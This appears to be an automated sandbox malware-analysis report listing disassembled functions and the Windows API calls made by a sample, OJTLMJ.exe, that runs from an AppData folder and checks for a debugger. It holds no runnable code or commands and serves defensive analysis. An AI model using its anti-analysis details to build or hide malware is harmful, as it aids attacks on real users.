                                                                                                                Similarity
                                                                                                                • API ID: Window$Foreground
                                                                                                                • String ID:
                                                                                                                • API String ID: 62970417-0
                                                                                                                • Opcode ID: ee1c78e8616b348e49ba12c898bc7312de66f920aff9f4454cb4f0e01d77b0a2
                                                                                                                • Instruction ID: d977e53e710c5106f9f5839be678b0f61d498d0c4c14a0ce6671e0ad1a0834d9
                                                                                                                • Opcode Fuzzy Hash: ee1c78e8616b348e49ba12c898bc7312de66f920aff9f4454cb4f0e01d77b0a2
                                                                                                                • Instruction Fuzzy Hash: E1218C72600206AFDB11AB74C891FFE76AAEF80788F040429F95AC6141EB70EA45D770
                                                                                                                APIs
                                                                                                                • IsThemeActive.UXTHEME ref: 00D436E6
                                                                                                                  • Part of subcall function 00D62025: __lock.LIBCMT ref: 00D6202B
                                                                                                                  • Part of subcall function 00D432DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00D432F6
                                                                                                                  • Part of subcall function 00D432DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00D4330B
                                                                                                                  • Part of subcall function 00D4374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00D4376D
                                                                                                                  • Part of subcall function 00D4374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00D4377F
                                                                                                                  • Part of subcall function 00D4374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe,00000104,?,00E01120,C:\Users\user\AppData\Roaming\Windata\OJTLMJ.exe,00E01124,?,?), ref: 00D437EE
                                                                                                                  • Part of subcall function 00D4374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00D43860
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00D43726
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 924797094-0
                                                                                                                • Opcode ID: 21db5f3eace88edb97610e4e80e214204f5bd26b087eda8c41437adef4bfc986
                                                                                                                • Instruction ID: ef36046f3e91d6cb346f25b5ca8468dec23eb03c8ea0658c74116b84d397bbe4
                                                                                                                • Opcode Fuzzy Hash: 21db5f3eace88edb97610e4e80e214204f5bd26b087eda8c41437adef4bfc986
                                                                                                                • Instruction Fuzzy Hash: 6F119D719083429FC710DF2ADC4991ABBE8FF95750F00451EF885972A1EB759988CBB2
                                                                                                                APIs
                                                                                                                • ___lock_fhandle.LIBCMT ref: 00D6F7D9
                                                                                                                • __close_nolock.LIBCMT ref: 00D6F7F2
                                                                                                                  • Part of subcall function 00D6886A: __getptd_noexit.LIBCMT ref: 00D6886A
                                                                                                                  • Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1046115767-0
                                                                                                                • Opcode ID: d284710c1b524156febbfad0fcebde4dd6378efca6fe8aad217506a1e92ca815
                                                                                                                • Instruction ID: 630f64a2c534bdc65227c1277dd113738d0a9fa41f81e0c4163be98bf1e134b3
                                                                                                                • Opcode Fuzzy Hash: d284710c1b524156febbfad0fcebde4dd6378efca6fe8aad217506a1e92ca815
                                                                                                                • Instruction Fuzzy Hash: 751182B2805A148FD711BFA8F8423587B90EF41335F9603A0E5656F1E3CBB4998097B1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D645EC: __FF_MSGBANNER.LIBCMT ref: 00D64603
                                                                                                                  • Part of subcall function 00D645EC: __NMSG_WRITE.LIBCMT ref: 00D6460A
                                                                                                                  • Part of subcall function 00D645EC: RtlAllocateHeap.NTDLL(013B0000,00000000,00000001,?,?,?,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D6462F
                                                                                                                • std::exception::exception.LIBCMT ref: 00D6013E
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00D60153
                                                                                                                  • Part of subcall function 00D67495: RaiseException.KERNEL32(?,?,00D4125D,00DF6598,?,?,?,00D60158,00D4125D,00DF6598,?,00000001), ref: 00D674E6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902256705-0
                                                                                                                • Opcode ID: bf8bc0690248d737bff2edb9e8b70dfe91917ab1d4f7902ef7002e5c9f8dff5c
                                                                                                                • Instruction ID: f0aa4543f1c316162de57479fe8a0868e968bd45fad2ac3ea3636b8a79084cda
                                                                                                                • Opcode Fuzzy Hash: bf8bc0690248d737bff2edb9e8b70dfe91917ab1d4f7902ef7002e5c9f8dff5c
                                                                                                                • Instruction Fuzzy Hash: C1F0A43510420EA7C715AFA8DC02AEF7BE9DF15354F14042AF905D6281DBB0D68196B5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D6889E: __getptd_noexit.LIBCMT ref: 00D6889E
                                                                                                                • __lock_file.LIBCMT ref: 00D642B9
                                                                                                                  • Part of subcall function 00D65A9F: __lock.LIBCMT ref: 00D65AC2
                                                                                                                • __fclose_nolock.LIBCMT ref: 00D642C4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: 3fe84d551c50a76da535d13f2501b591b6b5b13bba4fb9d58fab4242ec78120d
                                                                                                                • Instruction ID: 483505c1f41695f26a689e14873f91f496a71aa265715908a94784f25103dba4
                                                                                                                • Opcode Fuzzy Hash: 3fe84d551c50a76da535d13f2501b591b6b5b13bba4fb9d58fab4242ec78120d
                                                                                                                • Instruction Fuzzy Hash: B1F0B4318117099BD710BB75880276E6BD0AF45738F358209F8649B1C1CB7CD9819B79
                                                                                                                APIs
                                                                                                                • ___crtCorExitProcess.LIBCMT ref: 00D61D6B
                                                                                                                  • Part of subcall function 00D61D33: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00DCED50,?,?,00D61D70,00D60127,?,00D68A37,000000FF,0000001E,00DF68C8,00000008,00D6899B,00D60127,00D60127), ref: 00D61D42
                                                                                                                  • Part of subcall function 00D61D33: GetProcAddress.KERNEL32(00DCED50,CorExitProcess), ref: 00D61D54
                                                                                                                • ExitProcess.KERNEL32 ref: 00D61D74
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                • String ID:
                                                                                                                • API String ID: 2427264223-0
                                                                                                                • Opcode ID: 384668bc91abb08e25c79e7e3e7ad5d79e5c4f366692a9f8ee7c0cfa7be53354
                                                                                                                • Instruction ID: 0a802f868993aa31a3e6084a19cf00bc2ac9abf8d7a35d73228fe4338112ce35
                                                                                                                • Opcode Fuzzy Hash: 384668bc91abb08e25c79e7e3e7ad5d79e5c4f366692a9f8ee7c0cfa7be53354
                                                                                                                • Instruction Fuzzy Hash: 46B09230000209BBCB012F11DD0A8883F2AEB01390B004038F80448131DBB2AA919AE1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
                                                                                                                • Instruction ID: 9ee7a246fd434a2384eb0c3e5517cb1207aa860988e84c3eda0830d82991f34f
                                                                                                                • Opcode Fuzzy Hash: 1881b95582f27488270194163bdcf0f55d1034154a259e89151eb0eef9976d72
                                                                                                                • Instruction Fuzzy Hash: D041AD79200702DFD724DF19C491A62F7E0FF99361718C42EE99A8B761DB30E852CB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 35184e4eadc934e89421af2af9aa746e4c0def3cf1b7c530c71cb65aff16bec1
                                                                                                                • Instruction ID: 1f3a4881a170694c49c3384f7b9a910c3193ef41464d9c6322c4e71c8c8b9f55
                                                                                                                • Opcode Fuzzy Hash: 35184e4eadc934e89421af2af9aa746e4c0def3cf1b7c530c71cb65aff16bec1
                                                                                                                • Instruction Fuzzy Hash: CB412B74504751CFDB24CF18C444B1ABBE1BF49308F1985ACE99A4B362D372E885CF62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D43F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00D43F90
                                                                                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00D434E2,?,00000001), ref: 00D43FCD
                                                                                                                  • Part of subcall function 00D43E78: FreeLibrary.KERNEL32(00000000), ref: 00D43EAB
                                                                                                                  • Part of subcall function 00D44010: _memmove.LIBCMT ref: 00D4405A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Free$Load_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3640140200-0
                                                                                                                • Opcode ID: ca36538fc4ca6f62ab07272b7e1b2539bcd748527d5f31af3d754d7e6c89beea
                                                                                                                • Instruction ID: 4cd498d0122415cda4840eefa533ea1e3759987ef41db000a1c83f929b285240
                                                                                                                • Opcode Fuzzy Hash: ca36538fc4ca6f62ab07272b7e1b2539bcd748527d5f31af3d754d7e6c89beea
                                                                                                                • Instruction Fuzzy Hash: D511A032610315ABCF14BB68EC12F9E77A9DF50B00F108929F582E61C1DB759A459B70
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1473721057-0
                                                                                                                • Opcode ID: 920a95db795add0906cc2424803b579ab972e04ebdbf925f004c6d5c3f0875f9
                                                                                                                • Instruction ID: 42518b26062960b87f2b106d858674f8179ce64640f8a2f65a12fe55c1639dea
                                                                                                                • Opcode Fuzzy Hash: 920a95db795add0906cc2424803b579ab972e04ebdbf925f004c6d5c3f0875f9
                                                                                                                • Instruction Fuzzy Hash: F8212470508701CFEB24DF28C444A5ABBE1BF89345F194968E99647622D331E889CF62
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                • Instruction ID: fbb52de14fecdd4098cd0b61999a197ff464f4c07d9056007e32bcc258d2f701
                                                                                                                • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                • Instruction Fuzzy Hash: 3901F9722107016FD7549B39CC07A67BB98DF44760F54C92EF99ACB1D1EB71E4008A70
                                                                                                                APIs
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00D434E2,?,00000001), ref: 00D43E6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: c132988470e9461521afb4ec7cf61c3750efe73e3ac70f88cb247a2816446286
                                                                                                                • Instruction ID: 7714832d777ea4d24841ce224bd7aa697bf440fea488244dbec9f5d84e5ec27a
                                                                                                                • Opcode Fuzzy Hash: c132988470e9461521afb4ec7cf61c3750efe73e3ac70f88cb247a2816446286
                                                                                                                • Instruction Fuzzy Hash: D5F03971102752DFCB349FA8D890812BBE1EF147253288B3EF1D682621C7319944DF20
                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 00D6201B
                                                                                                                  • Part of subcall function 00D61EE2: __lock.LIBCMT ref: 00D61EF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 368792745-0
                                                                                                                • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                • Instruction ID: df195b48e73ba6a4ddc4e153b8a103dfe192426daaca960bf850cb7ae4e37e93
                                                                                                                • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                • Instruction Fuzzy Hash: 49B0123158030D33D9102D91EC03F053B0C9760B50F240020FE0C1C1E2E593F56441E9
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00DAF64E
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DAF6AD
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00DAF6EA
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DAF711
                                                                                                                • SendMessageW.USER32 ref: 00DAF737
                                                                                                                • _wcsncpy.LIBCMT ref: 00DAF7A3
                                                                                                                • GetKeyState.USER32(00000011), ref: 00DAF7C4
                                                                                                                • GetKeyState.USER32(00000009), ref: 00DAF7D1
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DAF7E7
                                                                                                                • GetKeyState.USER32(00000010), ref: 00DAF7F1
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DAF820
                                                                                                                • SendMessageW.USER32 ref: 00DAF843
                                                                                                                • SendMessageW.USER32(?,00001030,?,00DADE69), ref: 00DAF940
                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00DAF956
                                                                                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00DAF967
                                                                                                                • SetCapture.USER32(?), ref: 00DAF970
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00DAF9D4
                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00DAF9E0
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00DAF9FA
                                                                                                                • ReleaseCapture.USER32 ref: 00DAFA05
                                                                                                                • GetCursorPos.USER32(?), ref: 00DAFA3A
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00DAFA47
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DAFAA9
                                                                                                                • SendMessageW.USER32 ref: 00DAFAD3
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DAFB12
                                                                                                                • SendMessageW.USER32 ref: 00DAFB3D
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DAFB55
                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DAFB60
                                                                                                                • GetCursorPos.USER32(?), ref: 00DAFB81
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00DAFB8E
                                                                                                                • GetParent.USER32(?), ref: 00DAFBAA
                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00DAFC10
                                                                                                                • SendMessageW.USER32 ref: 00DAFC40
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00DAFC96
                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DAFCC2
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00DAFCEA
                                                                                                                • SendMessageW.USER32 ref: 00DAFD0D
                                                                                                                • ClientToScreen.USER32(?,?), ref: 00DAFD57
                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DAFD87
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00DAFE1C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                • API String ID: 2516578528-4164748364
                                                                                                                • Opcode ID: 4220dc19a011e30d6c212a465dc54269234e513c76aa888b0a81aa0cd2f7929a
                                                                                                                • Instruction ID: af8c9181b9d4c7228d873157cd5a8b4f95b1064018514eefd3c3c0f3abfbc210
                                                                                                                • Opcode Fuzzy Hash: 4220dc19a011e30d6c212a465dc54269234e513c76aa888b0a81aa0cd2f7929a
                                                                                                                • Instruction Fuzzy Hash: 6732AA70204306AFDB14DFA4C884FAABBA5FF4A318F0809A9F595872A1D731DC45CB71
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00DAAFDB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: %d/%02d/%02d
                                                                                                                • API String ID: 3850602802-328681919
                                                                                                                • Opcode ID: 3e6d31f5254eef137012830d357e6f85155c78bfcd663ba01ffe06c2581bff02
                                                                                                                • Instruction ID: 69b954dae6601c0f763402ccc3a0a501fa17067de5a9df642270328af272d34f
                                                                                                                • Opcode Fuzzy Hash: 3e6d31f5254eef137012830d357e6f85155c78bfcd663ba01ffe06c2581bff02
                                                                                                                • Instruction Fuzzy Hash: 99129E71500309AFEB258F68CC49FAE7BB9EF46310F144229F956EB291DB748941CB32
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,00000000), ref: 00D5F796
